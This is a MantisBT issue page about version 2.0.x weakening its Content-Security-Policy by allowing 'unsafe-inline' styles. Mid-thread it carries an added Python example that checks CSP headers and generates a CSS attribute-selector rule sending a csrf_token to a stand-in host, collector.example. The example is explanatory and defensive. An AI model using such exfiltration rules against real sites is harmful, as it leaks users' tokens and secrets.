View Issue Details

ID: 0021908
Project: mantisbt
Category: security
View Status: public
Last Update: 2017-12-04 02:25
Reporter: atrol
Assigned To:
Priority: normal
Severity: minor
Reproducibility: always
Status: new
Resolution: open
Product Version:
Target Version: 2.10.0
Fixed in Version:
Summary: 0021908: Weakened security headers in 2.0.x
Description

2.0.x comes with http_csp_add( 'style-src', "'unsafe-inline'" ); in http_api.php.
We don't allow unsafe-inline styles in 1.3.x.

Tags: csp

Activities

yanual

2017-11-06 05:56

reporter   ~0058143

Why don't you allow unsafe-inline styles in 1.3.x?

atrol

2017-11-06 06:03

developer   ~0058144

> Why don't you allow unsafe-inline styles in 1.3.x?

Wrong question, it should be: Why do you allow unsafe-inline styles in 2.x?

Allowing unsafe-inline styles decreases security.
That's why I reported the issue.

dregad

2017-11-06 06:40

developer   ~0058147

@yanual I suggest you read https://stackoverflow.com/a/31759553/1045774 for a brief explanation of the potential risks to your site when unsafe-inline styles are allowed.

yanual

2017-11-06 09:11

reporter   ~0058148

@atrol your formulation is indeed better.
OK, I will wait patiently for the postponement of the treatment of the issue.
@dregad I know these risks.
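The following is an added example, not MantisBT code and not part of this thread. It makes the two technical points above concrete: the description's `http_csp_add( 'style-src', "'unsafe-inline'" )` line, and dregad's note about the risk of honouring inline styles. `CspBuilder`, `build_policy` and the policies it emits are constructed stand-ins for the accumulate-then-emit pattern the quoted call suggests (MantisBT's real headers are not reproduced here); `collector.example` and the `csrf_token` field name are likewise hypothetical. The checker follows the CSP Level 2/3 rules a browser applies to `style-src`: fallback to `default-src` when the directive is absent, a duplicate directive ignored, and `'unsafe-inline'` neutralised when the same directive also carries a nonce- or hash-source.

```python
"""Added example (not MantisBT code): evaluate whether a Content-Security-Policy
lets a browser apply inline styles, and show why that matters.

`CspBuilder` is a constructed stand-in for an http_csp_add()-style API; the
policies produced by `build_policy` are illustrative, not MantisBT's own.
"""
from collections import OrderedDict
from typing import Dict, List, Optional

HASH_OR_NONCE_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a serialized policy into directive -> source list.

    Per the CSP spec, a directive name that appears a second time in the same
    policy is ignored, so only the first occurrence is kept.
    """
    policy: "OrderedDict[str, List[str]]" = OrderedDict()
    for raw in header.split(";"):
        tokens = raw.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name in policy:
            continue
        policy[name] = tokens[1:]
    return policy


def effective_sources(policy: Dict[str, List[str]], directive: str) -> Optional[List[str]]:
    """Sources governing `directive`; style-src falls back to default-src.
    None means the policy places no restriction on that fetch type at all."""
    if directive in policy:
        return policy[directive]
    return policy.get("default-src")


def allows_inline_styles(header: str) -> bool:
    """True if a <style> block or style="" attribute would be applied."""
    sources = effective_sources(parse_csp(header), "style-src")
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    # A nonce- or hash-source in the directive makes CSP2+ browsers ignore
    # 'unsafe-inline', so only the nonced/hashed styles are honoured.
    if any(s.startswith(HASH_OR_NONCE_PREFIXES) for s in lowered):
        return False
    return "'unsafe-inline'" in lowered


class CspBuilder:
    """Accumulate sources per directive and serialize them: the shape of an
    http_csp_add()-style API (constructed; not the real MantisBT function)."""

    def __init__(self) -> None:
        self._directives: "OrderedDict[str, List[str]]" = OrderedDict()

    def add(self, directive: str, source: str) -> "CspBuilder":
        bucket = self._directives.setdefault(directive, [])
        if source not in bucket:
            bucket.append(source)
        return self

    def header(self) -> str:
        return "; ".join(f"{d} {' '.join(s)}" for d, s in self._directives.items())


def build_policy(inline_styles: str = "forbid") -> str:
    """Constructed policies: 'forbid' (the 1.3.x stance the issue describes),
    'unsafe-inline' (the 2.0.x line under discussion), or 'nonce' (a hardened
    alternative that still permits specific inline <style> blocks)."""
    b = CspBuilder().add("default-src", "'self'").add("style-src", "'self'")
    if inline_styles == "unsafe-inline":
        b.add("style-src", "'unsafe-inline'")
    elif inline_styles == "nonce":
        # A real nonce must be unpredictable, fresh per response, and echoed
        # on every <style nonce=""> the page emits; this one is a placeholder.
        b.add("style-src", "'nonce-d2VhayBleGFtcGxl'")
    return b.add("script-src", "'self'").header()


def css_exfil_rule(field: str, known_prefix: str, collector: str) -> str:
    """One rule of the well-known attribute-selector exfiltration an attacker can
    mount once injected inline CSS is honoured: the browser fetches the
    background image only when the field's value starts with `known_prefix`,
    leaking the value one character at a time.  Shown to make the risk concrete,
    not as an attack against any real page."""
    return (f'input[name="{field}"][value^="{known_prefix}"]'
            f'{{background-image:url("{collector}/{known_prefix}")}}')


if __name__ == "__main__":
    for mode in ("forbid", "unsafe-inline", "nonce"):
        hdr = build_policy(mode)
        print(f"{mode:14} inline styles allowed={allows_inline_styles(hdr)!s:5}  {hdr}")
    print(css_exfil_rule("csrf_token", "a", "https://collector.example"))
```

Running the block prints the three constructed policies with their verdicts and one exfiltration rule. The point to take from it is that `'unsafe-inline'` on `style-src` lets any CSS an attacker can get into the page be applied, which is enough for the selector-based leakage `css_exfil_rule` sketches; a per-response nonce keeps the legitimate inline styles working while closing that door.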

Issue History

Date Modified Username Field Change
2016-11-13 06:45 atrol New Issue
2016-11-14 06:20 atrol Tag Attached: csp
2016-11-27 08:20 dregad Target Version 2.0.0-rc.2 => 2.0.0
2016-12-30 15:56 vboctor Target Version 2.0.0 => 2.0.1
2017-02-01 22:49 vboctor Target Version 2.0.1 => 2.2.0
2017-02-26 21:19 vboctor Target Version 2.2.0 => 2.3.0
2017-04-01 00:20 vboctor Target Version 2.3.0 => 2.4.0
2017-04-30 14:53 vboctoradmin Target Version 2.4.0 => 2.5.0
2017-06-04 16:19 atrol Target Version 2.5.0 => 2.6.0
2017-09-03 18:49 vboctor Target Version 2.6.0 => 2.7.0
2017-10-08 23:55 vboctor Target Version 2.7.0 => 2.8.0
2017-10-28 19:14 vboctor Target Version 2.8.0 => 2.9.0
2017-11-06 05:56 yanual Note Added: 0058143
2017-11-06 06:03 atrol Note Added: 0058144
2017-11-06 06:40 dregad Note Added: 0058147
2017-11-06 09:11 yanual Note Added: 0058148
2017-12-04 02:25 vboctor Target Version 2.9.0 => 2.10.0